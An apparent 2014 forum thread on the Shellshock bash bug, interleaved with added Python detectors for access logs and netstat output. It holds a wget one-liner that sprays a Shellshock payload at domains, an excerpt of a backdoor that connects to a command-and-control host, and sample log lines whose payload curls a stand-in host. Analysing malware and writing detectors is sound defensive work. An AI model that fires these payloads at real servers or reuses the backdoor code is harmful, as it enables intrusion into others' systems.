A new BASH bug?

    #61
    If I remember your CV correctly, Steve, you did have some programming classes under your belt.

    BTW, feathers, can you post the rest of the Python code in cl.py? (I'm too lazy to use wget to dl it from
    http://google-traffic-analytics.com/cl.py)
    "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people."
    – John F. Kennedy, February 26, 1962.



      #62
      Originally posted by GreyGeek View Post
      BTW, feathers, can you post the rest of the Python code in cl.py? (I'm too lazy to use wget to dl it from
      http://google-traffic-analytics.com/cl.py)
      That was the lot!
      samhobbs.co.uk



        #63
        Originally posted by SteveRiley View Post
        It's quite difficult to insert something into the stream once the HTTPS session is established.

        If you were just spraying loads of domains, would something like this not work?

        Code:
        wget --secure-protocol=auto --no-check-certificate -U "() { test;};/usr/bin/checkmate" domain.com/cgi-bin/test
        Originally posted by SteveRiley View Post
        Too many choices!! Can you recommend a good one? Development seems to have stalled for some of the ones listed on the OWASP page.
        samhobbs.co.uk
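The wget one-liner above puts the Shellshock trigger in the User-Agent header, which is exactly where a web server writes it into its access log. The following is an added example, not code from the thread or from any of its participants: a small Python detector that parses Apache "combined" format log lines and flags any request whose request line, Referer or User-Agent carries a `() {` function-definition prefix. The log lines it runs on are constructed for the example (the first one reuses the payload string quoted in the post); the field names and the `find_shellshock_attempts` function are this example's own choices.

```python
import re

# Constructed sample lines in Apache "combined" log format. They are NOT from the thread
# or from any real server: line 1 carries the User-Agent payload quoted in the post above,
# lines 3 and 4 are variations (payload in the Referer, payload without the space), and
# line 2 is ordinary traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Oct/2014:16:36:32 +0100] "GET /cgi-bin/test HTTP/1.1" 404 292 "-" "() { test;};/usr/bin/checkmate"
203.0.113.11 - - [05/Oct/2014:16:37:01 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.12 - - [05/Oct/2014:16:38:15 +0100] "GET /cgi-bin/status HTTP/1.1" 200 17 "() { :; }; /bin/bash -c 'curl http://example.invalid/x'" "Wget/1.15 (linux-gnu)"
203.0.113.13 - - [05/Oct/2014:16:39:40 +0100] "GET /cgi-bin/test HTTP/1.1" 200 5 "-" "(){ :;};echo vulnerable"
"""

# Combined log format: ip ident user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Shellshock trigger is a header value that begins with a bash function definition.
# CVE-2014-6271 needed the exact prefix "() {"; the \s* is deliberately looser so that
# variants such as "(){" are flagged too, at the cost of a few more lines to triage.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def find_shellshock_attempts(log_text):
    """Return one finding per log line whose request line, Referer or User-Agent
    carries a Shellshock-style payload. Lines that do not parse are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        f = m.groupdict()
        tainted = [name for name in ("req", "referer", "ua") if SHELLSHOCK_RE.search(f[name])]
        if not tainted:
            continue
        parts = f["req"].split()  # "GET /cgi-bin/test HTTP/1.1" -> method, path, version
        findings.append({
            "ip": f["ip"],
            "path": parts[1] if len(parts) > 1 else "",
            "status": int(f["status"]),
            "fields": tainted,
        })
    return findings


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print("%(ip)s %(path)s status=%(status)d payload in %(fields)s" % hit)
```

Feed it a real access log with `find_shellshock_attempts(open(path).read())`. A hit only shows that someone sent the trigger, not that the CGI script ran under a vulnerable bash, so the 200 responses against `/cgi-bin/` paths are the ones to look at first.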



          #64
          Originally posted by Feathers McGraw View Post
          That was the lot!
          I had a Duh! moment (one of many these days) and just opened the code using a tab in FF. You did post the whole thing! I was expecting an encrypted IP but it's just relying on an active connection, so if one ran netstat while it was connected and checked the 9091 port an IP address would be visible.
          "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people."
          – John F. Kennedy, February 26, 1962.



            #65
            Originally posted by GreyGeek View Post
            I was expecting an encrypted IP but it's just relying on an active connection, so if one ran netstat while it was connected and checked the 9091 port an IP address would be visible.
            I don't even think you'd need to do that to find out the IP address, since the script gives a domain name...

            Code:
            if fpid!=0:
            
                host='stats.google-traffic-analytics.com'   # command-and-control hostname (resolves to 162.244.34.27, see dig below)
                port=9091                                   # command-and-control port
            ...
                def connect():
                    try:
                        sockobj=socket(AF_INET,SOCK_STREAM)
                        sockobj.connect((host,port))        # outbound TCP connection to the C2 server
                        return sockobj
                    except:
                        return False                        # any failure (DNS, refused, timeout) is swallowed
            Code:
            feathers-mcgraw@Hobbs-T440s:~$ dig stats.google-traffic-analytics.com 
            ; <<>> DiG 9.9.5-3-Ubuntu <<>> stats.google-traffic-analytics.com
            ;; global options: +cmd
            ;; Got answer:
            ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48675
            ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
            
            ;; OPT PSEUDOSECTION:
            ; EDNS: version: 0, flags:; udp: 4096
            ;; QUESTION SECTION:
            ;stats.google-traffic-analytics.com. IN A
            
            ;; ANSWER SECTION:
            stats.google-traffic-analytics.com. 3600 IN A   162.244.34.27
            
            ;; Query time: 166 msec
            ;; SERVER: 127.0.1.1#53(127.0.1.1)
            ;; WHEN: Sun Oct 05 16:36:32 BST 2014
            ;; MSG SIZE  rcvd: 79
            I am surprised that that domain name isn't already owned by Google, to be honest. It's quite a clever one to use because it looks kind of legit.
            samhobbs.co.uk



              #66
              I was surprised too. I thought it was a google site that had been hacked. Whois on the domain name pulled up nothing, but on the IP address dig gave, the results were:
              Code:
              whois 162.244.34.27
              
              #
              # ARIN WHOIS data and services are subject to the Terms of Use
              # available at: https://www.arin.net/whois_tou.html
              #
              # If you see inaccuracies in the results, please report at
              # http://www.arin.net/public/whoisinaccuracy/index.xhtml
              #
              
              
              #
              # The following results may also be obtained via:
              # http://whois.arin.net/rest/nets;q=162.244.34.27?showDetails=true&showARIN=false&ext=netref2
              #
              
              
              # start
              
              NetRange:       162.244.32.0 - 162.244.35.255
              CIDR:           162.244.32.0/22
              OriginAS:       AS6939, AS30708, AS14576
              NetName:        KING-SERVERS
              NetHandle:      NET-162-244-32-0-1
              Parent:         NET-162-0-0-0-0
              NetType:        Direct Allocation
              Comment:        http://king-servers.com/
              RegDate:        2014-03-05
              Updated:        2014-03-05
              Ref:            http://whois.arin.net/rest/net/NET-162-244-32-0-1
              
              OrgName:        Hosting Solution Ltd.
              OrgId:          HSL-50
              Address:        Office:
              Address:        Hosting Solution Ltd.
              Address:        201 Rogers Office Building
              Address:        Edwin Wallace Rey Drive
              Address:        George Hill,
              Address:        Anguilla
              Address:        
              Address:        Data Center:
              Address:        Hosting Solution Ltd.
              Address:        C/O Hurricane Electric
              Address:        48233 Warm Springs Blvd
              City:           Fremont
              StateProv:      CA
              PostalCode:     94539
              Country:        US
              RegDate:        2013-05-31
              Updated:        2014-10-02
              Comment:        http://king-servers.com/
              Ref:            http://whois.arin.net/rest/org/HSL-50
              
              OrgAbuseHandle: ABUSE4868-ARIN
              OrgAbuseName:   Abuse Department
              OrgAbusePhone:  +1-408-622-0063 
              OrgAbuseEmail:  abuse@king-servers.com
              OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE4868-ARIN
              
              OrgNOCHandle: NOC32063-ARIN
              OrgNOCName:   Network Operations Center
              OrgNOCPhone:  +1-408-622-0063 
              OrgNOCEmail:  noc@king-servers.com
              OrgNOCRef:    http://whois.arin.net/rest/poc/NOC32063-ARIN
              
              OrgTechHandle: NOC32063-ARIN
              OrgTechName:   Network Operations Center
              OrgTechPhone:  +1-408-622-0063 
              OrgTechEmail:  noc@king-servers.com
              OrgTechRef:    http://whois.arin.net/rest/poc/NOC32063-ARIN
              
              # end
              
              
              # start
              
              NetRange:       162.244.34.0 - 162.244.34.255
              CIDR:           162.244.34.0/24
              OriginAS:       AS14576
              NetName:        KING-SERVERS-R003-R004
              NetHandle:      NET-162-244-34-0-1
              Parent:         NET-162-244-32-0-1
              NetType:        Reassigned
              RegDate:        2014-04-19
              Updated:        2014-04-19
              Ref:            http://whois.arin.net/rest/net/NET-162-244-34-0-1
              
              CustName:       Hosting Solution Ltd.
              Address:        48233 Warm Springs Blvd
              City:           Fremont
              StateProv:      CA
              PostalCode:     94539
              Country:        US
              RegDate:        2014-04-19
              Updated:        2014-04-19
              Ref:            http://whois.arin.net/rest/customer/C04995622
              
              OrgAbuseHandle: ABUSE4868-ARIN
              OrgAbuseName:   Abuse Department
              OrgAbusePhone:  +1-408-622-0063 
              OrgAbuseEmail:  abuse@king-servers.com
              OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE4868-ARIN
              
              OrgNOCHandle: NOC32063-ARIN
              OrgNOCName:   Network Operations Center
              OrgNOCPhone:  +1-408-622-0063 
              OrgNOCEmail:  noc@king-servers.com
              OrgNOCRef:    http://whois.arin.net/rest/poc/NOC32063-ARIN
              
              OrgTechHandle: NOC32063-ARIN
              OrgTechName:   Network Operations Center
              OrgTechPhone:  +1-408-622-0063 
              OrgTechEmail:  noc@king-servers.com
              OrgTechRef:    http://whois.arin.net/rest/poc/NOC32063-ARIN
              
              # end
              That "google" site has a basic Apache2 web test page on it.
              "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people."
              – John F. Kennedy, February 26, 1962.
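Posts #64 to #66 work out the indicators of this backdoor by hand: a hard-coded port (9091), the hostname it connects to, the A record that hostname resolves to, and the ARIN block that address is reassigned into. The following is an added example, not part of the thread: a Python check that parses `netstat -tn` style output and flags any connection to that port or into that /24. The netstat text it runs on is constructed for the example (the first connection line is what a host running cl.py would show while connected); the column layout is the Linux `netstat -tn` one, and the function and constant names are this example's own.

```python
import re
import ipaddress

# Constructed sample in the layout of `netstat -tn` on Linux. NOT captured from a real
# machine: line 1 is what the cl.py connect() would look like while connected, the others
# are ordinary traffic plus two near-misses (same /24 on port 80, same port elsewhere).
SAMPLE_NETSTAT = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.168.1.20:45210      162.244.34.27:9091      ESTABLISHED
tcp        0      0 192.168.1.20:52114      93.184.216.34:443       ESTABLISHED
tcp        0      0 192.168.1.20:39900      162.244.34.200:80       TIME_WAIT
tcp        0      0 192.168.1.20:33000      198.51.100.7:9091       SYN_SENT
"""

# Indicators taken from the thread: the port hard-coded in cl.py, and the /24 that ARIN
# shows the resolved address 162.244.34.27 reassigned into.
C2_PORT = 9091
C2_NET = ipaddress.ip_network("162.244.34.0/24")

# One netstat data line: proto recv-q send-q local remote state
NETSTAT_RE = re.compile(
    r'^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<laddr>\S+)\s+(?P<raddr>\S+)\s+(?P<state>\S+)$'
)


def split_addr(addr):
    """'162.244.34.27:9091' -> ('162.244.34.27', 9091). rpartition splits on the last
    colon, so IPv6 text such as '::ffff:10.0.0.1:22' keeps its address intact."""
    host, _, port = addr.rpartition(':')
    return host, int(port)


def find_suspect_connections(netstat_text, port=C2_PORT, net=C2_NET):
    """Return every connection whose remote side uses the C2 port or lies in the C2 net,
    with the reason(s) it matched. Non-established states are reported too: a SYN_SENT
    to the C2 port is the backdoor retrying while the server is down."""
    findings = []
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue  # header lines and anything we do not understand
        rhost, rport = split_addr(m.group("raddr"))
        reasons = []
        if rport == port:
            reasons.append("remote port %d" % port)
        try:
            if ipaddress.ip_address(rhost) in net:
                reasons.append("remote host in %s" % net)
        except ValueError:
            pass  # not a literal address (netstat without -n prints names); skip the net check
        if reasons:
            findings.append({
                "remote": rhost,
                "port": rport,
                "state": m.group("state"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspect_connections(SAMPLE_NETSTAT):
        print("%(remote)s:%(port)d %(state)s  <- %(reasons)s" % f)
```

On a live host, pipe `netstat -tn` into it (`ss -tn` prints a different column order and would need its own regex). The port check is the one that survives if the operators move the domain to a new address; the net check is the one that survives if they change the port, so the two are reported separately rather than combined into a single yes/no.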



                #67
                Originally posted by Feathers McGraw View Post
                Too many choices!! Can you recommend a good one? Development seems to have stalled for some of the ones listed on the OWASP page.
                PeachFuzz community edition: http://sourceforge.net/projects/peachfuzz/
                Zed Attack Proxy: https://www.owasp.org/index.php/OWAS..._Proxy_Project

                FindBugs, static analysis for Java: http://findbugs.sourceforge.net/



                  #68
                  Thanks for your recommendations! Now all I have to do is write something that needs testing

                  Originally posted by SteveRiley View Post
                  I can't seem to locate anything written by the Google researchers that describe how they discovered it.
                  An update on this: the Google researcher who discovered heartbleed was
                  doing laborious auditing of OpenSSL, going through the [Secure Sockets Layer] stack line by line
                  http://soylentnews.org/article.pl?sid=14/10/11/1516242
                  samhobbs.co.uk

